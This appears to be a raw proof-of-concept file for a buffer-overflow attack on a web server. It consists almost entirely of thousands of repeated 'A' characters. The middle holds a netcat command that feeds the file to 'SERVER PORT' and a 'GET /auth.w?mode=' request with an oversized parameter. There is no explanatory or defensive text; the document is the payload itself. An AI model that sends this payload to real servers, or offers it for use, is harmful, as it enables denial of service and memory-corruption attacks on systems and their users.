AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA - - nc SERVER PORT -v -v < webmodz3.txt - -GET /auth.w?mode=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA